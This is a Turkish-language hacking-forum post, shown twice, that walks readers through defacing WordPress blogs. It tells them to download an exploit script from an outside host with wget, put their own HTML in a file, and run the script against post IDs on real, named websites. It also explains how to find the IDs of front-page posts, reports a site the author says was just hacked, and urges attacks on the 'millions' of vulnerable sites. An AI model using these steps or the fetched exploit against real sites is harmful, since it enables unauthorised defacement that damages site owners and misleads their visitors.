[font=Tahoma,]Piyasaya yeni düşen bu exploit ile wordpress blog sitelerinin postlarına kendi mesajınızı inject edebiliyorsunuz , öncelikle python çalıştırabilecek bir terminale ihtiyacınız var , bende fazladan bir sunucu olduğu için putty ile bağlanıp sunucunun terminalinde exploiti çalıştırdım. Sizde kali var ise ordanda işinizi görebilirsiniz kolayca[/font]
[font=Tahoma,]ilk önce hedef siteyi belirledim.[/font]
[font=Tahoma,]http://www.elitevmb.com/uncategorized/hello-world/[/font]
[font=Tahoma,]sonra exploiti aşağıdaki komutla terminale çektim[/font]
[font=Tahoma,]wget http://w0rms.com/wp.py[/font]
[font=Tahoma,]ardından aşağıdaki komut ile bir dosya oluşturun[/font]
[font=Tahoma,]nano mec[/font]
[font=Tahoma,]oluşturduğunuz mec dosyasının içine html index kodlarınızı yerleştirin ve kayıt edip dosyayı kapatın[/font]
[font=Tahoma,]ikinci adım olarak bir aşağıdaki komutu girdim , girdikten sonra aşağıdaki resimdeki gibi bir sonuç çıktı[/font]
[font=Tahoma,]python wp.py http://www.elitevmb.com/uncategorized/hello-world/ 1 mec[/font]
[font=Tahoma,]Post updated. Check it out at[/font][font=Tahoma,] --> bu kısımda size hacklenen url yi otomatik olarak veriyor.[/font]
[font=Tahoma,]Sonuç olarak post kısmı hacklendi[/font]
[font=Tahoma,][size=small][font=Tahoma,]Piyasada hala daha belkide milyonlarca açıklı wordpress site var bu şekilde. bu açığı çok daha faydalı kullanabilirsiniz.[/font]
[/font][/size]
[font=Tahoma,]python exploit manuel indirmek için : [/font][font=Tahoma,]http://w0rms.com/wp.py[/font]
[font=Tahoma,]MAKALEYE EK YAPILDI !![/font]
[font=Tahoma,]python wp.py http://www.elitevmb.com/uncategorized/hello-world/ 1 mec[/font]
[font=Tahoma,]yukardaki komutumuzu biliyorsunuz , oradaki 1 rakamı sitede bulunan postun id numarasını temsil eder ve ilk post olan id 1 ile numaralandırılmış postu hacklemiş olursunuz , ancak siz ana sayfadaki postları hacklemek istiyorsunuz ? ozaman sitenin kaynak kodunu açın ve [/font][font=Tahoma,]post-[/font][font=Tahoma,] şeklinde veya [/font][font=Tahoma,]post_id[/font][font=Tahoma,] olarak aratın genellikle yanında bir rakam olur işte o post id numarasıdır , örnek verecek olursam [/font][font=Tahoma,]hedefsite.com/?p=325[/font][font=Tahoma,] bu şekilde id noları deneyebilirsiniz , anasayfadaki postu bulana kadar hızlıca denemeler yapıp kolayca bulmanız mümkün , zaten kaynak koddan çıkan id numaraları ana sayfadaki postlara ait oluyor , mesala bulduk en tepedeki postun id nosunu ve bu numara diyelimki 325 , ozaman kodumuz aşağıdaki gibi olacak[/font]
[font=Tahoma,][size=small][font=Tahoma,]python wp.py http://www.elitevmb.com/uncategorized/hello-world/ 325 mec
yani id 1 olmadı diye hemen başka siteye geçmeyin , sitedeki post idlerini manuel olarakda araştırın.
örnek yeni hacklediğim site: http://www.hostadasi.com/google-apps-mx-kaydi-degerleri.html id numarası 325 di [img=18x18]http://spyhackerz.com/forum/styles/default/xenforo/clear.png[/img][/font][/SIZE][/font]
[font=Tahoma,]ilk önce hedef siteyi belirledim.[/font]
[font=Tahoma,]http://www.elitevmb.com/uncategorized/hello-world/[/font]
[font=Tahoma,]sonra exploiti aşağıdaki komutla terminale çektim[/font]
[font=Tahoma,]wget http://w0rms.com/wp.py[/font]
[font=Tahoma,]ardından aşağıdaki komut ile bir dosya oluşturun[/font]
[font=Tahoma,]nano mec[/font]
[font=Tahoma,]oluşturduğunuz mec dosyasının içine html index kodlarınızı yerleştirin ve kayıt edip dosyayı kapatın[/font]
[font=Tahoma,]ikinci adım olarak bir aşağıdaki komutu girdim , girdikten sonra aşağıdaki resimdeki gibi bir sonuç çıktı[/font]
[font=Tahoma,]python wp.py http://www.elitevmb.com/uncategorized/hello-world/ 1 mec[/font]
[font=Tahoma,]Post updated. Check it out at[/font][font=Tahoma,] --> bu kısımda size hacklenen url yi otomatik olarak veriyor.[/font]
[font=Tahoma,]Sonuç olarak post kısmı hacklendi[/font]
[font=Tahoma,][size=small][font=Tahoma,]Piyasada hala daha belkide milyonlarca açıklı wordpress site var bu şekilde. bu açığı çok daha faydalı kullanabilirsiniz.[/font]
[/font][/size]
[font=Tahoma,]python exploit manuel indirmek için : [/font][font=Tahoma,]http://w0rms.com/wp.py[/font]
[font=Tahoma,]MAKALEYE EK YAPILDI !![/font]
[font=Tahoma,]python wp.py http://www.elitevmb.com/uncategorized/hello-world/ 1 mec[/font]
[font=Tahoma,]yukardaki komutumuzu biliyorsunuz , oradaki 1 rakamı sitede bulunan postun id numarasını temsil eder ve ilk post olan id 1 ile numaralandırılmış postu hacklemiş olursunuz , ancak siz ana sayfadaki postları hacklemek istiyorsunuz ? ozaman sitenin kaynak kodunu açın ve [/font][font=Tahoma,]post-[/font][font=Tahoma,] şeklinde veya [/font][font=Tahoma,]post_id[/font][font=Tahoma,] olarak aratın genellikle yanında bir rakam olur işte o post id numarasıdır , örnek verecek olursam [/font][font=Tahoma,]hedefsite.com/?p=325[/font][font=Tahoma,] bu şekilde id noları deneyebilirsiniz , anasayfadaki postu bulana kadar hızlıca denemeler yapıp kolayca bulmanız mümkün , zaten kaynak koddan çıkan id numaraları ana sayfadaki postlara ait oluyor , mesala bulduk en tepedeki postun id nosunu ve bu numara diyelimki 325 , ozaman kodumuz aşağıdaki gibi olacak[/font]
[font=Tahoma,][size=small][font=Tahoma,]python wp.py http://www.elitevmb.com/uncategorized/hello-world/ 325 mec
yani id 1 olmadı diye hemen başka siteye geçmeyin , sitedeki post idlerini manuel olarakda araştırın.
örnek yeni hacklediğim site: http://www.hostadasi.com/google-apps-mx-kaydi-degerleri.html id numarası 325 di [img=18x18]http://spyhackerz.com/forum/styles/default/xenforo/clear.png[/img][/font][/SIZE][/font]